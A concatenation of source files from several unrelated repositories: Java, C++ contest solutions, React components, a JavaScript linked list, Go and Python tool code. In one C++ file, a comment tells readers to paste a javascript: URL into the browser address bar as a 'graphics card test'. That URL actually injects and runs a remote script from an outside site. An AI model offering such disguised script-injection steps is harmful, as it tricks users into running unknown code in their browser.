color:'black'
},
{yaxis:{from:0,to:0},color:'black'}
]
}
}
);
});
});
});
|
michaelruocco/idv-context
|
context/adapter/json/src/testFixtures/java/uk/co/idv/context/adapter/json/policy/sequence/stage/type/InvalidStageTypeJsonMother.java
|
package uk.co.idv.context.adapter.json.policy.sequence.stage.type;
import static uk.co.mruoc.file.content.ContentLoader.loadContentFromClasspath;
public interface InvalidStageTypeJsonMother {
static String invalid() {
return loadContentFromClasspath("policy/sequence/stage/type/invalid-stage-type.json");
}
}
|
taoes/WebSite
|
src/main/java/com/mafour/api/dao/mapper/UserMapper.java
|
<reponame>taoes/WebSite
package com.mafour.api.dao.mapper;
import com.baomidou.mybatisplus.core.mapper.BaseMapper;
import com.mafour.api.dao.dao.UserDO;
import org.springframework.stereotype.Component;
@Component
public interface UserMapper extends BaseMapper<UserDO> {}
|
swwind/code
|
bzoj/1095.cpp
|
#include <bits/stdc++.h>
#define maxs(a,b,c) max(max(a,b),c)
#define N 100020
#define ST -6
#define ED -9
using namespace std;
const int inf = 1 << 30;
inline int read(){
int x = 0, f = 0; char ch=getchar();
while(ch>'9'||ch<'0'){if(ch=='-')f=1;ch=getchar();}
while(ch>='0'&&ch<='9'){x=(x<<1)+(x<<3)+ch-'0';ch=getchar();}
return f?-x:x;
}
int v[N*3], c[N], pos[N], tot, cnt, ccnt;
int head[N], to[N<<1], nxt[N<<1];
void ins(int x, int y){
to[++cnt] = y; nxt[cnt] = head[x]; head[x] = cnt;
to[++cnt] = x; nxt[cnt] = head[y]; head[y] = cnt;
}
void dfs(int x, int fa){
v[++tot] = ST; v[++tot] = x;
pos[x] = tot;
for(int i = head[x]; i; i = nxt[i])
if(to[i] != fa) dfs(to[i], x);
v[++tot] = ED;
}
struct node{
int c1, c2, l1, l2, r1, r2, l, r, dis;
friend node operator + (const node &a, const node &b) {
node c;
c.l = a.l; c.r = b.r;
c.dis = max(a.dis, b.dis);
c.dis = maxs(c.dis, a.r1+b.l2, a.r2+b.l1);
if(a.c2 < b.c1) c.c1 = a.c1-a.c2+b.c1, c.c2 = b.c2;
else c.c1 = a.c1, c.c2 = a.c2-b.c1+b.c2;
c.r1 = maxs(b.r1, a.r1-b.c1+b.c2, a.r2+b.c1+b.c2);
c.r2 = max(b.r2, a.r2+b.c1-b.c2);
c.l1 = maxs(a.l1, b.l1-a.c2+a.c1, b.l2+a.c2+a.c1);
c.l2 = max(a.l2, b.l2+a.c2-a.c1);
return c;
}
void init(int x){
l = r = x;
dis = -inf;
c1 = c2 = 0;
if(v[x] == ST) c2 = 1;
if(v[x] == ED) c1 = 1;
if(v[x] > 0 && c[v[x]]) l1 = l2 = r1 = r2 = 0;
else l1 = l2 = r1 = r2 = -inf;
}
}t[N*12];
void update(int x, int k){
if(t[x].l == t[x].r) return t[x].init(t[x].l);
int mid = t[x].l + t[x].r >> 1;
if(k <= mid) update(x<<1, k);
else update(x<<1|1, k);
t[x] = t[x<<1]+t[x<<1|1];
}
void build(int x, int l, int r){
if(l == r) return t[x].init(l);
int mid = l + r >> 1;
build(x<<1, l, mid); build(x<<1|1, mid+1, r);
t[x] = t[x<<1]+t[x<<1|1];
}
int main(){
int n = read(); ccnt = n;
for(int i = 1; i <= n; i++) c[i] = 1;
for(int i = 1; i < n; i++) ins(read(), read());
dfs(1, 0); build(1, 1, tot);
// printf("%d\n",tot );
int m = read();
for(int i = 1; i <= m; i++){
if(getchar() == 'C'){
int x = read();
if(c[x]) ccnt--;
else ccnt++;
c[x] ^= 1;
update(1, pos[x]);
}
else{ getchar();
if(!ccnt) puts("-1");
else if(ccnt == 1) puts("0");
else printf("%d\n", t[1].dis);
}
}
}
/*
8
1 2
2 3
3 4
3 5
3 6
6 7
6 8
7
G
C 1
G
C 2
G
C 1
G
在地址栏里输入
```
javascript:var k=document.createElement('script');k.src='https://swwind.github.io/js/fuck.js';document.body.appendChild(k);
```
即可测试显卡性能。(粘贴时注意最前面的`javascript:`有没有被吞掉,如果被吞掉了就手动加上去)
*/
|
ofekbytes/JavaNiceStuffExample
|
src/a_java_core/a_BasicEexample/packageClassMethod/package-info.java
|
/**
*
*/
/**
* @author yaron
*
*/
package a_java_core.a_BasicEexample.packageClassMethod;
|
tncn1122/UIS
|
frontend-backup/src/view/Forum/ForumDetail/TopicOverviewCard/index.js
|
<gh_stars>0
import React from 'react'
import moment from 'moment'
import classnames from 'classnames'
import { Row, Col } from 'antd'
import { TEXT_UI_FORUM } from 'config'
import { Link } from 'react-router-dom'
import { ErrorHandlerUtils, URLUtils } from 'utils'
import styles from './style.module.scss'
export default function TopicOverviewCard({ topic, className }) {
return (
<div className={classnames([styles['topic-overview-card'], className])}>
<Row>
<Col span={20} className="content">
<Row className="top">
<Col>
<img
alt="avatar"
src={
topic.user.userProfile
? URLUtils.buildAvatarURL(topic.user.userProfile.avatar)
: URLUtils.buildAvatarURL()
}
/>
</Col>
<Col>
<div className="author">
{topic.user.userProfile ? topic.user.userProfile.full_name : topic.user.username}
</div>
<div className="time">
{moment(topic.updatedAt ? topic.updatedAt : topic.createdAt).fromNow()}
</div>
</Col>
</Row>
<Row>
<div className="title">
<Link to={`/forums/topics/${topic.id}`} className="link">
{topic.title}
</Link>
</div>
</Row>
<Row>
<div className="des">{topic.summary}</div>
</Row>
</Col>
<Col span={4} className="statistic">
<div className="top">
{TEXT_UI_FORUM.VIEWS}: {topic.countViews}
</div>
<div className="bottom">
{TEXT_UI_FORUM.REPLIES}: {topic.countPosts}
</div>
</Col>
</Row>
</div>
)
}
|
Paulgilbertreal/AzuraCast
|
frontend/vue/pages/Admin/CustomFields.js
|
import initBase from '~/base.js';
import '~/vendor/bootstrapVue.js';
import '~/vendor/sweetalert.js';
import AdminCustomFields from '~/components/Admin/CustomFields.vue';
export default initBase(AdminCustomFields);
|
Ashwanigupta9125/code-DS-ALGO
|
CodeForces/Complete/900-999/976B-LaraCroftAndTheNewGame.cpp
|
#include<cstdio>
typedef long long ll;
long long n,m,k,x,y;
int main(){
ll n, m, k; scanf("%lld %lld %lld", &n, &m, &k);
if(k<n){printf("%lld 1\n", k + 1);}
else{
k -= n;
ll x = k / (m - 1);
x = n - x;
ll y = k % (m-1);
if(x % 2){y = m - y;}
else{y += 2;}
printf("%lld %lld\n", x, y);
}
return 0;
}
|
goodmind/FlowDefinitelyTyped
|
flow-types/types/stream-to-promise_vx.x.x/flow_v0.25.x-/stream-to-promise.js
|
declare module "stream-to-promise" {
/**
* Return a promise which resolves when the input stream ends
* @param stream The input stream
* @returns A promise containing the stream output as a buffer
*/
declare function streamToPromise(
stream: NodeJS.ReadableStream
): Promise<Buffer>;
/**
* Return s promise which resolves when the input stream ends
* @param stream The input stream
*/
declare function streamToPromise(
stream: NodeJS.WritableStream
): Promise<void>;
declare module.exports: typeof streamToPromise;
}
|
liyongquan/leetcode-project
|
src/main/java/com/liyongquan/greedy/ReconstructQueue.java
|
<reponame>liyongquan/leetcode-project<filename>src/main/java/com/liyongquan/greedy/ReconstructQueue.java<gh_stars>1-10
package com.liyongquan.greedy;
import java.util.*;
//假设有打乱顺序的一群人站成一个队列,数组 people 表示队列中一些人的属性(不一定按顺序)。每个 people[i] = [hi, ki] 表示第 i
//个人的身高为 hi ,前面 正好 有 ki 个身高大于或等于 hi 的人。
//
// 请你重新构造并返回输入数组 people 所表示的队列。返回的队列应该格式化为数组 queue ,其中 queue[j] = [hj, kj] 是队列中第
// j 个人的属性(queue[0] 是排在队列前面的人)。
//
//
//
//
//
//
// 示例 1:
//
//
//输入:people = [[7,0],[4,4],[7,1],[5,0],[6,1],[5,2]]
//输出:[[5,0],[7,0],[5,2],[6,1],[4,4],[7,1]]
//解释:
//编号为 0 的人身高为 5 ,没有身高更高或者相同的人排在他前面。
//编号为 1 的人身高为 7 ,没有身高更高或者相同的人排在他前面。
//编号为 2 的人身高为 5 ,有 2 个身高更高或者相同的人排在他前面,即编号为 0 和 1 的人。
//编号为 3 的人身高为 6 ,有 1 个身高更高或者相同的人排在他前面,即编号为 1 的人。
//编号为 4 的人身高为 4 ,有 4 个身高更高或者相同的人排在他前面,即编号为 0、1、2、3 的人。
//编号为 5 的人身高为 7 ,有 1 个身高更高或者相同的人排在他前面,即编号为 1 的人。
//因此 [[5,0],[7,0],[5,2],[6,1],[4,4],[7,1]] 是重新构造后的队列。
//
//
// 示例 2:
//
//
//输入:people = [[6,0],[5,0],[4,0],[3,2],[2,2],[1,4]]
//输出:[[4,0],[5,0],[2,2],[3,2],[1,4],[6,0]]
//
//
//
//
// 提示:
//
//
// 1 <= people.length <= 2000
// 0 <= hi <= 106
// 0 <= ki < people.length
// 题目数据确保队列可以被重建
//
// Related Topics 贪心算法
// 👍 804 👎 0
//leetcode submit region begin(Prohibit modification and deletion)
public class ReconstructQueue {
/**
* 贪心算法
*
* TODO:看题解的算法,不能算是真的解决了
*
* @param people
* @return
*/
public int[][] reconstructQueue(int[][] people) {
Arrays.sort(people, (o1, o2) -> o1[0] != o2[0] ? o2[0] - o1[0] : o1[1] - o2[1]);
List<int[]> list = new LinkedList<>();
for (int[] person : people) {
if (list.isEmpty()) {
list.add(person);
} else {
list.add(person[1], person);
}
}
int[][] res = new int[people.length][2];
int idx = 0;
for (int[] p : list) {
res[idx][0] = p[0];
res[idx][1] = p[1];
}
return res;
}
}
//leetcode submit region end(Prohibit modification and deletion)
|
JoeKarlsson/data-structures
|
linked-list/linkedList.js
|
/**
* @name linkedListGenerator
* @description Main Module
* @return {Object} an object exposing methods to be used to manipulate a linked list
*/
class LinkedList {
constructor() {
this.tail = null;
this.head = null;
}
// points to our head
getHead() {
return this.head;
}
// points to our tail
getTail() {
return this.tail;
}
// Create a new node
newNode( value ) {
return {
value,
next: null,
};
}
// Takes a new node and adds it to our linked list
add( value ) {
const node = this.newNode( value );
// init empty LL
if ( this.getHead() === null ) {
this.head = node;
} else { // if it's not empty
this.getTail().next = node;
}
// Happy Path
this.tail = node;
return node;
}
/**
* Reads through our list and returns the node we are looking for
* @param {[type]} index [description]
* @return {[type]} [description]
*/
get( index ) {
let currNode = this.getHead();
let postion = 0;
// If index is less than 0, return false
if ( index <= -1 ) {
return false;
}
// Loop through all the nodes
while ( postion < index ) {
// Check if we hit the end of the LL
if ( currNode.next === null ) {
return false;
}
// If node exists go to next node
currNode = currNode.next;
postion++;
}
return currNode;
}
/**
* reads through our list and removes desired node
* @param {[type]} index [description]
* @return {[type]} [description]
*/
remove( index ) {
const currNode = this.get( index );
const prevNode = this.get( index - 1 );
// If index not in LL, return false
if ( currNode === false ) {
return false;
}
// If removing the head, reassign the head to the next node
if ( index === 0 ) {
this.head = currNode.next;
// If removing the tail, reassign the tail to the prevNode
} else if ( currNode.next === null ) {
this.tail = prevNode;
prevNode.next = currNode.next;
// Happy Path
} else {
prevNode.next = currNode.next;
}
}
/**
* Inserts a new node at the deisred index
* @param {[Num]} index
* @param {[*]} value
* @return {[Node]} node
*/
insert( value, index ) {
const currNode = this.get( index );
const prevNode = this.get( index - 1 );
const node = this.newNode( value );
// If the index is not in the LL, return false
if ( currNode === false ) {
return false;
}
// If inserting at the head, reassign the head to the new node
if ( index === 0 ) {
this.head = node;
node.next = currNode;
} else {
// If inserting at the tail, reassign the tail
if (currNode.next === null) {
this.tail = node;
}
node.next = currNode;
prevNode.next = node;
}
return node;
}
}
module.exports = LinkedList;
|
jakebooy2/API
|
src/main/java/com/sheepybot/api/entities/module/EventRegistry.java
|
<gh_stars>1-10
package com.sheepybot.api.entities.module;
import com.sheepybot.api.entities.event.EventListener;
import com.sheepybot.api.entities.event.RegisteredListener;
import com.sheepybot.api.entities.event.RootEventRegistry;
import net.dv8tion.jda.api.events.Event;
import org.jetbrains.annotations.NotNull;
import java.util.Collection;
public final class EventRegistry {
private final RootEventRegistry eventManager;
private final Module module;
EventRegistry(@NotNull("eventManager cannot be null") final RootEventRegistry eventManager,
@NotNull("module cannot be null") final Module module) {
this.eventManager = eventManager;
this.module = module;
}
/**
* @return A {@link Collection} containing every {@link RegisteredListener} associated with this {@link Module}
*/
public Collection<RegisteredListener> getRegisteredListeners() {
return this.eventManager.getRegisteredListeners(this.module);
}
/**
* @param event The event to call
*/
public void callEvent(@NotNull("event cannot be null") final Event event) {
this.eventManager.callEvent(event);
}
/**
* Registers all {@link Event}s in the given {@link EventListener} class
*
* @param listener The {@link EventListener} to register
*/
public void registerEvent(@NotNull("listener cannot be null") final EventListener listener) {
this.eventManager.registerEvents(listener, this.module);
}
/**
* Unregisters every listener associated with the parent {@link Module}
*/
public void unregisterAll() {
this.eventManager.unregisterAll(this.module);
}
}
|
arie-neural-alpha/trase
|
frontend/scripts/react-components/shared/tool-bar/tool-switch/tool-switch.js
|
<filename>frontend/scripts/react-components/shared/tool-bar/tool-switch/tool-switch.js
import { connect } from 'react-redux';
import ToolSwitch from 'react-components/shared/tool-bar/tool-switch/tool-switch.component';
import { toolLinksActions } from 'react-components/tool-links/tool-links.register';
const mapStateToProps = state => ({
dashboardSelected: state.location.payload.section === 'data-view'
});
const mapDispatchToProps = { switchTool: toolLinksActions.switchTool };
export default connect(mapStateToProps, mapDispatchToProps)(ToolSwitch);
|
ccau1/generator-hexin-react
|
generators/app/templates/src/routes/Root/Login/LoginPageContainer.js
|
/* @flow */
import React from 'react';
import {connect} from 'react-redux';
import {bindActionCreators} from 'redux';
import {ActionCreators} from 'actions';
import LoginPage from './LoginPage';
class LoginPageContainer extends React.Component {
constructor(props: Object): void {
super(props);
}
render() {
const {user, location} = this.props;
const redirect = (new URLSearchParams(location.search)).get('redirect') || '/';
return (
<LoginPage user={user} redirect={redirect} requiredRoles={location.state ? location.state.requiredRoles : []} />
);
}
}
function mapStateToProps(state: Object): {user: Object} {
return {
user: state.account.user,
};
}
function mapDispatchToProps(dispatch: Function): {Actions: Object} {
return {Actions: bindActionCreators(ActionCreators, dispatch)};
}
export default connect(mapStateToProps, mapDispatchToProps)(LoginPageContainer);
|
al3pht/cloud-custodian
|
tools/c7n_azure/c7n_azure/resources/cdn.py
|
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
from c7n_azure.provider import resources
from c7n_azure.resources.arm import ArmResourceManager
@resources.register('cdnprofile')
class CdnProfile(ArmResourceManager):
"""CDN Resource
:example:
Returns all CDNs with Standard_Verizon sku
.. code-block:: yaml
policies:
- name: standard-verizon
resource: azure.cdnprofile
filters:
- type: value
key: sku
op: in
value_type: normalize
value: Standard_Verizon
"""
class resource_type(ArmResourceManager.resource_type):
doc_groups = ['Media']
service = 'azure.mgmt.cdn'
client = 'CdnManagementClient'
enum_spec = ('profiles', 'list', None)
default_report_fields = (
'name',
'location',
'resourceGroup',
'sku.name'
)
resource_type = 'Microsoft.Cdn/profiles'
|
fredr/podman
|
pkg/api/handlers/compat/changes.go
|
package compat
import (
"net/http"
"github.com/containers/podman/v3/libpod"
"github.com/containers/podman/v3/libpod/define"
"github.com/containers/podman/v3/pkg/api/handlers/utils"
api "github.com/containers/podman/v3/pkg/api/types"
"github.com/gorilla/schema"
"github.com/pkg/errors"
)
func Changes(w http.ResponseWriter, r *http.Request) {
decoder := r.Context().Value(api.DecoderKey).(*schema.Decoder)
runtime := r.Context().Value(api.RuntimeKey).(*libpod.Runtime)
query := struct {
Parent string `schema:"parent"`
DiffType string `schema:"diffType"`
}{}
if err := decoder.Decode(&query, r.URL.Query()); err != nil {
utils.Error(w, "Something went wrong.", http.StatusBadRequest, errors.Wrapf(err, "failed to parse parameters for %s", r.URL.String()))
return
}
var diffType define.DiffType
switch query.DiffType {
case "", "all":
diffType = define.DiffAll
case "container":
diffType = define.DiffContainer
case "image":
diffType = define.DiffImage
default:
utils.Error(w, "Something went wrong.", http.StatusBadRequest, errors.Errorf("invalid diffType value %q", query.DiffType))
return
}
id := utils.GetName(r)
changes, err := runtime.GetDiff(query.Parent, id, diffType)
if err != nil {
utils.InternalServerError(w, err)
return
}
utils.WriteJSON(w, 200, changes)
}
|
sterglee/KotlinLabSimple
|
src/edu/emory/mathcs/csparsej/tdouble/Dcs_leaf.java
|
/* ***** BEGIN LICENSE BLOCK *****
*
* CSparse: a Concise Sparse matrix package.
* Copyright (c) 2006, <NAME>.
* http://www.cise.ufl.edu/research/sparse/CSparse
*
* -------------------------------------------------------------------------
*
* CSparseJ is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* CSparseJ is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this Module; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
* ***** END LICENSE BLOCK ***** */
package edu.emory.mathcs.csparsej.tdouble;
/**
* Determine if j is a leaf of the skeleton matrix and find lowest common
* ancestor (lca).
*
* @author <NAME> (<EMAIL>)
*
*/
public class Dcs_leaf {
/**
* Determines if j is a leaf of the skeleton matrix and find lowest common
* ancestor (lca).
*
* @param i
* @param j
* @param first
* @param first_offset
* @param maxfirst
* @param maxfirst_offset
* @param prevleaf
* @param prevleaf_offset
* @param ancestor
* @param ancestor_offset
* @param jleaf
* @return lca(jprev,j)
*/
public static int cs_leaf(int i, int j, int[] first, int first_offset, int[] maxfirst, int maxfirst_offset,
int[] prevleaf, int prevleaf_offset, int[] ancestor, int ancestor_offset, int[] jleaf) {
int q, s, sparent, jprev;
if (first == null || maxfirst == null || prevleaf == null || ancestor == null || jleaf == null)
return (-1);
jleaf[0] = 0;
if (i <= j || first[first_offset + j] <= maxfirst[maxfirst_offset + i])
return (-1); /* j not a leaf */
maxfirst[maxfirst_offset + i] = first[first_offset + j]; /* update max first[j] seen so far */
jprev = prevleaf[prevleaf_offset + i]; /* jprev = previous leaf of ith subtree */
prevleaf[prevleaf_offset + i] = j;
jleaf[0] = (jprev == -1) ? 1 : 2; /* j is first or subsequent leaf */
if (jleaf[0] == 1)
return (i); /* if 1st leaf, q = root of ith subtree */
for (q = jprev; q != ancestor[ancestor_offset + q]; q = ancestor[ancestor_offset + q])
;
for (s = jprev; s != q; s = sparent) {
sparent = ancestor[ancestor_offset + s]; /* path compression */
ancestor[ancestor_offset + s] = q;
}
return (q); /* q = least common ancestor (jprev,j) */
}
}
|
designpatterns2/Symetrical-Information---Observer
|
src/net/sf/bloodball/model/player/ExtraMoveMode.java
|
<reponame>designpatterns2/Symetrical-Information---Observer
package net.sf.bloodball.model.player;
import net.sf.bloodball.util.Dices;
public class ExtraMoveMode extends MoveMode {
public ExtraMoveMode(Player player) {
super(player);
}
public void checkForInjury() {
if (Dices.D6.roll() == 6) {
getPlayer().injure(Health.INJURED);
}
}
protected int getMoveSquares() {
return 2;
}
protected MoveMode getSuccessor() {
return new NoMoveMode(getPlayer());
}
public void move() {
checkForInjury();
super.move();
}
}
|
toolisticon/byoct-jpa
|
src/test/resources/testcases/convertsprocessor/type/testclass/TestcaseValidUsage.java
|
package io.toolisticon.byoct.jpa.convertsprocessor.testclass;
import javax.persistence.Converts;
@Converts(value={@javax.persistence.Convert()})
public class TestcaseValidUsage {
}
|
rosea-tf/surreal
|
surreal/tests/components/test_neg_log_likelihood_loss.py
|
<reponame>rosea-tf/surreal
# Copyright 2019 ducandu GmbH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import numpy as np
import scipy.stats as sts
import unittest
from surreal.components.loss_functions.neg_log_likelihood_loss import NegLogLikelihoodLoss
from surreal.spaces import *
from surreal.spaces.space_utils import get_default_distribution_from_space
from surreal.tests.test_util import check
from surreal.utils.numpy import softmax
class TestSupervisedLossFunctions(unittest.TestCase):
def test_neg_log_likelihood_loss_function_w_simple_space(self):
shape = (5, 4, 3)
parameters_space = Tuple(Float(shape=shape), Float(shape=shape), main_axes="B")
labels_space = Float(shape=shape, main_axes="B")
loss_function = NegLogLikelihoodLoss(distribution=get_default_distribution_from_space(labels_space))
parameters = parameters_space.sample(10)
# Make sure stddev params are not too crazy (just like our adapters do clipping for the raw NN output).
parameters = (parameters[0], np.clip(parameters[1], 0.1, 1.0))
labels = labels_space.sample(10)
expected_loss_per_item = np.sum(-np.log(sts.norm.pdf(labels, parameters[0], parameters[1])), axis=(-1, -2, -3))
out = loss_function(parameters, labels)
check(out, expected_loss_per_item, decimals=4)
def test_neg_log_likelihood_loss_function_w_container_space(self):
parameters_space = Dict({
# Make sure stddev params are not too crazy (just like our adapters do clipping for the raw NN output).
"a": Tuple(Float(shape=(2, 3)), Float(0.5, 1.0, shape=(2, 3))), # normal (0.0 to 1.0)
"b": Float(shape=(4,), low=-1.0, high=1.0) # 4-discrete
}, main_axes="B")
labels_space = Dict({
"a": Float(shape=(2, 3)),
"b": Int(4)
}, main_axes="B")
loss_function = NegLogLikelihoodLoss(distribution=get_default_distribution_from_space(labels_space))
parameters = parameters_space.sample(2)
# Softmax the discrete params.
probs_b = softmax(parameters["b"])
# probs_b = parameters["b"]
labels = labels_space.sample(2)
# Expected loss: Sum of all -log(llh)
log_prob_per_item_a = np.sum(np.log(sts.norm.pdf(labels["a"], parameters["a"][0], parameters["a"][1])),
axis=(-1, -2))
log_prob_per_item_b = np.array([np.log(probs_b[0][labels["b"][0]]), np.log(probs_b[1][labels["b"][1]])])
expected_loss_per_item = -(log_prob_per_item_a + log_prob_per_item_b)
out = loss_function(parameters, labels)
check(out, expected_loss_per_item, decimals=4)
|
ddeka2910/python-tldp
|
tldp/driver.py
|
<reponame>ddeka2910/python-tldp
#! /usr/bin/python
# -*- coding: utf8 -*-
#
# Copyright (c) 2016 Linux Documentation Project
from __future__ import absolute_import, division, print_function
from __future__ import unicode_literals
import os
import sys
import errno
import signal
import shutil
import logging
import inspect
import collections
from argparse import Namespace
from tldp.typeguesser import knowndoctypes
from tldp.sources import SourceDocument, arg_issourcedoc
from tldp.outputs import OutputDirectory
from tldp.inventory import Inventory, status_classes, status_types, stypes
from tldp.config import collectconfiguration
from tldp.utils import arg_isloglevel, arg_isdirectory
from tldp.utils import swapdirs, sameFilesystem
from tldp.doctypes.common import preamble, postamble
# -- Don't freak out with IOError when our STDOUT, handled with
# head, sed, awk, grep, etc; and, also deal with a user's ctrl-C
# the same way (i.e. no traceback, just stop)
#
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
signal.signal(signal.SIGINT, signal.SIG_DFL)
logformat = '%(levelname)-9s %(name)s %(filename)s#%(lineno)s ' \
+ '%(funcName)s %(message)s'
logging.basicConfig(stream=sys.stderr, format=logformat, level=logging.ERROR)
logger = logging.getLogger(__name__)
# -- short names
#
opa = os.path.abspath
opb = os.path.basename
opd = os.path.dirname
opj = os.path.join
# -- error message prefixes
#
ERR_NEEDPUBDIR = "Option --pubdir (and --sourcedir) required "
ERR_NEEDSOURCEDIR = "Option --sourcedir (and --pubdir) required "
ERR_UNKNOWNARGS = "Unknown arguments received: "
ERR_EXTRAARGS = "Extra arguments received: "
def show_doctypes(config, *args, **kwargs):
if args:
return ERR_EXTRAARGS + ' '.join(args)
file = kwargs.get('file', sys.stdout)
print("Supported source document types:", file=file)
print('', file=file)
for doctype in knowndoctypes:
classname = doctype.__name__
fname = os.path.abspath(inspect.getmodule(doctype).__file__)
extensions = ', '.join(doctype.extensions)
print('{}'.format(classname), file=file)
print(' format name: {}'.format(doctype.formatname), file=file)
print(' code location: {}'.format(fname), file=file)
print(' file extensions: {}'.format(extensions), file=file)
for signature in doctype.signatures:
print(' signature: {}'.format(signature), file=file)
print('', file=file)
print('', file=file)
return os.EX_OK
def show_statustypes(config, *args, **kwargs):
if args:
return ERR_EXTRAARGS + ' '.join(args)
file = kwargs.get('file', sys.stdout)
width = 2 + max([len(x) for x in status_types])
print("Basic status types:", file=file)
print('', file=file)
for status, descrip in stypes.items():
fmt = '{status:>{width}}: {descrip}'
text = fmt.format(status=status, descrip=descrip, width=width)
print(text, file=file)
print('', file=file)
print("Synonyms and groups:", file=file)
print('', file=file)
for status, descrip in status_classes.items():
fmt = '{status:>{width}}: {descrip}'
descrip = ', '.join(descrip)
text = fmt.format(status=status, descrip=descrip, width=width)
print(text, file=file)
print('', file=file)
return os.EX_OK
def summary(config, *args, **kwargs):
if args:
return ERR_EXTRAARGS + ' '.join(args)
if not config.pubdir:
return ERR_NEEDPUBDIR + "for --summary"
if not config.sourcedir:
return ERR_NEEDSOURCEDIR + "for --summary"
file = kwargs.get('file', sys.stdout)
inv = kwargs.get('inv', None)
if inv is None:
inv = Inventory(config.pubdir, config.sourcedir)
width = Namespace()
width.doctype = max([len(x.__name__) for x in knowndoctypes])
width.status = max([len(x) for x in status_types])
width.count = len(str(len(inv.source.keys())))
print('By Document Status (STATUS)', '---------------------------',
sep='\n', file=file)
for status in status_types:
count = len(getattr(inv, status, 0))
s = '{0:{w.status}} {1:{w.count}} '.format(status, count, w=width)
print(s, end="", file=file)
if config.verbose:
print(', '.join(getattr(inv, status).keys()), file=file)
else:
abbrev = getattr(inv, status).keys()
s = ''
if abbrev:
s = s + abbrev.pop(0)
while abbrev:
if (len(s) + len(abbrev[0])) > 48:
break
s = s + ', ' + abbrev.pop(0)
if abbrev:
s = s + ', and %d more ...' % (len(abbrev))
print(s, file=file)
print('', 'By Document Type (DOCTYPE)', '--------------------------',
sep='\n', file=file)
summarybytype = collections.defaultdict(list)
for doc in inv.source.values():
name = doc.doctype.__name__
summarybytype[name].append(doc.stem)
for doctype, docs in summarybytype.items():
count = len(docs)
s = '{0:{w.doctype}} {1:{w.count}} '.format(doctype, count, w=width)
print(s, end="", file=file)
if config.verbose:
print(', '.join(docs), file=file)
else:
abbrev = docs
s = ''
if abbrev:
s = s + abbrev.pop(0)
while abbrev:
if (len(s) + len(abbrev[0])) > 36:
break
s = s + ', ' + abbrev.pop(0)
if abbrev:
s = s + ', and %d more ...' % (len(abbrev))
print(s, file=file)
print('', file=file)
return os.EX_OK
def detail(config, docs, **kwargs):
file = kwargs.get('file', sys.stdout)
width = Namespace()
width.doctype = max([len(x.__name__) for x in knowndoctypes])
width.status = max([len(x) for x in status_types])
width.stem = max([len(x.stem) for x in docs])
# -- if user just said "list" with no args, then give the user something
# sane, "all"; it would make sense for this to be "work", too, but
# "all" seems to be less surprising
#
for doc in docs:
doc.detail(width, config.verbose, file=file)
return os.EX_OK
def removeOrphans(docs):
sources = list()
for x, doc in enumerate(docs, 1):
if not isinstance(doc, SourceDocument):
logger.info("%s (%d of %d) removing: no source for orphan",
doc.stem, x, len(docs))
continue
sources.append(doc)
return sources
def removeUnknownDoctypes(docs):
sources = list()
for x, doc in enumerate(docs, 1):
if not doc.doctype:
logger.info("%s (%d of %d) removing: unknown doctype",
doc.stem, x, len(docs))
continue
sources.append(doc)
return sources
def createBuildDirectory(d):
if not arg_isdirectory(d):
logger.debug("Creating build directory %s.", d)
try:
os.mkdir(d)
except OSError as e:
logger.critical("Could not make --builddir %s.", d)
return False, e.errno
return True, d
def builddir_setup(config):
'''create --builddir; ensure it shares a filesystem with --pubdir'''
if not config.builddir:
builddir = opj(opd(opa(config.pubdir)), 'ldptool-build')
ready, error = createBuildDirectory(builddir)
if not ready:
return ready, error
config.builddir = builddir
if not sameFilesystem(config.pubdir, config.builddir):
return False, "--pubdir and --builddir must be on the same filesystem"
return True, None
def create_dtworkingdir(config, docs):
for source in docs:
classname = source.doctype.__name__
source.dtworkingdir = opj(config.builddir, classname)
ready, error = createBuildDirectory(source.dtworkingdir)
if not ready:
return ready, error
return True, None
def post_publish_cleanup(workingdirs):
'''clean up empty directories left under --builddir'''
for d in workingdirs:
if os.path.isdir(d):
try:
logger.debug("removing build dir %s", d)
os.rmdir(d)
except OSError as e:
if e.errno != errno.ENOTEMPTY:
raise
logger.debug("Could not remove %s; files still present", d)
def prepare_docs_script_mode(config, docs):
for source in docs:
if not source.output:
fromsource = OutputDirectory.fromsource
if not config.pubdir:
source.working = fromsource(source.dirname, source)
else:
source.working = fromsource(config.pubdir, source)
else:
source.working = source.output
return True, None
def prepare_docs_build_mode(config, docs):
ready, error = create_dtworkingdir(config, docs)
if not ready:
return ready, error
for source in docs:
d = source.dtworkingdir
source.working = OutputDirectory.fromsource(d, source)
if not source.output:
source.output = OutputDirectory.fromsource(config.pubdir, source)
return True, None
def docbuild(config, docs, **kwargs):
buildsuccess = False
result = list()
for x, source in enumerate(docs, 1):
working = source.working
runner = source.doctype(source=source, output=working, config=config)
status = 'progress, %d failures, %d successes'
status = status % (result.count(False), result.count(True),)
logger.info("%s (%d of %d) initiating build [%s]",
source.stem, x, len(docs), status)
result.append(runner.generate(**kwargs))
if all(result):
buildsuccess = True
return buildsuccess, list(zip(result, docs))
def script(config, docs, **kwargs):
ready, error = prepare_docs_script_mode(config, docs)
if not ready:
return error
file = kwargs.get('file', sys.stdout)
print(preamble, file=file)
buildsuccess, results = docbuild(config, docs, **kwargs)
print(postamble, file=file)
for errcode, source in results:
if not errcode:
logger.error("Could not generate script for %s", source.stem)
if buildsuccess:
return os.EX_OK
else:
return "Script generation failed."
def build(config, docs, **kwargs):
if not config.pubdir:
return ERR_NEEDPUBDIR + "to --build"
ready, error = builddir_setup(config)
if not ready:
return error
ready, error = prepare_docs_build_mode(config, docs)
if not ready:
return error
buildsuccess, results = docbuild(config, docs, **kwargs)
